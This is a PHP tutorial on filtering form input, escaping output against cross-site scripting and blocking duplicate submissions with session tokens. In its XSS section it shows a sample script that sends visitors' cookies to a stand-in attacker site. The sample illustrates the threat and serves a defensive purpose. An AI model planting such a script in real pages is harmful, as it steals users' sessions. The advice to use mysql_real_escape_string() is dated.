PHP Form validation and processing – part 3
Part 1 and Part 2 about the proper use of PHP forms dealt with form validation methods and error handling. This last part covers how to process the submitted data and how to protect your forms against misuse.
Filtering and Processing
Filtering is one of the cornerstones of web application security. By ensuring that all data is filtered, you can eliminate the risk that tainted data is trusted or misused. Proper filtering takes three steps:
- Identify the input
- Filter the data
- Distinguish between tainted and filtered data
Before you can filter your data you must know what it is and where it comes from. Input can be sent by the client, or retrieved from a database or from RSS feeds. Data that originates from the client is usually accessed through the superglobal arrays $_GET and $_POST. You should always use these arrays to prevent global variable injection, and turn off register_globals in your php.ini settings.
Filtering the data accompanies the validation methods described in the first two parts. Its purpose is to prevent invalid data from entering the application.
After validating and filtering your data, store it separately for further processing. A handy way is to keep it in an array named $clean. By using only data from this array you can be sure that the data is ready for the application.
<?php
$clean = array();   // holds only validated and filtered values
// Copy the username only if it was sent and consists solely of letters and digits.
if (isset($_POST['username']) && ctype_alnum($_POST['username'])) {
    $clean['username'] = $_POST['username'];
}
?>
Escaping user input
If you want to display user-entered data on your website you need to prevent Cross-Site Scripting (XSS) issues. XSS is one of the best known types of attack against web applications. If data entered by the user is not properly filtered and escaped, a cross-site scripting vulnerability exists. Consider the following case, where someone enters some JavaScript into an input field which is then displayed unescaped on your site:
<script>
document.location =
'http://www.evilsite.com/stealdata.php?cookies=' + document.cookie
</script>
Because the risk exists only when you display tainted, unescaped data, you can prevent this attack by filtering input and escaping output. The latter is achieved with htmlentities(), which converts all special characters to their equivalent HTML entities. It is important that all data is escaped for the context it is used in, including data that is stored in a database rather than displayed; for MySQL queries this is done with the mysql_real_escape_string() function.
Multiple form submissions
Another problem concerning forms is a user submitting the same form more than once. The following solution prevents accidental double submissions and adds a barrier for a malicious user. It won’t eliminate all fraudulent use, which would require more complicated work.
The solution creates a unique token that is placed in the form. On submission, you check whether the token has already been processed or not. Submitted tokens can be stored in a SQLite database or in a session for easy handling.
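The session-based variant of this token scheme, as an added example that is not part of the original article: the token is generated when the form is rendered, remembered in the session, and accepted exactly once on submission. It also reuses the $clean filtering and htmlentities() escaping from the sections above; the field names, function names and messages are this example's own choices.

```php
<?php
// Added example (not from the original article): one-time form token stored
// in the session to reject duplicate submissions of the same form.
session_start();

// Called when rendering the form: create a fresh token and remember it server-side.
function issue_form_token(): string
{
    $token = bin2hex(random_bytes(16));          // 32 hex chars, unpredictable
    $_SESSION['form_tokens'][$token] = time();   // unused tokens, keyed by value
    return $token;
}

// Called on submission: a token is accepted only once, then forgotten.
function consume_form_token(?string $token): bool
{
    if ($token === null || !isset($_SESSION['form_tokens'][$token])) {
        return false;                            // missing, unknown or already used
    }
    unset($_SESSION['form_tokens'][$token]);     // a second submit of this token fails
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!consume_form_token($_POST['token'] ?? null)) {
        exit('This form has already been submitted.');
    }
    // Filter into $clean, as in the section above, before using the data.
    $clean = array();
    if (isset($_POST['username']) && ctype_alnum($_POST['username'])) {
        $clean['username'] = $_POST['username'];
    }
    // Escape for HTML output when echoing the value back to the browser.
    echo 'Hello, ' . htmlentities($clean['username'] ?? '', ENT_QUOTES, 'UTF-8');
} else {
    $token = issue_form_token();
    echo '<form method="post">'
       . '<input type="hidden" name="token" value="'
       . htmlentities($token, ENT_QUOTES, 'UTF-8') . '">'
       . '<input type="text" name="username">'
       . '<input type="submit" value="Send">'
       . '</form>';
}
```

Reloading the page after a successful POST resends the same hidden token, so the second request is rejected instead of being processed twice.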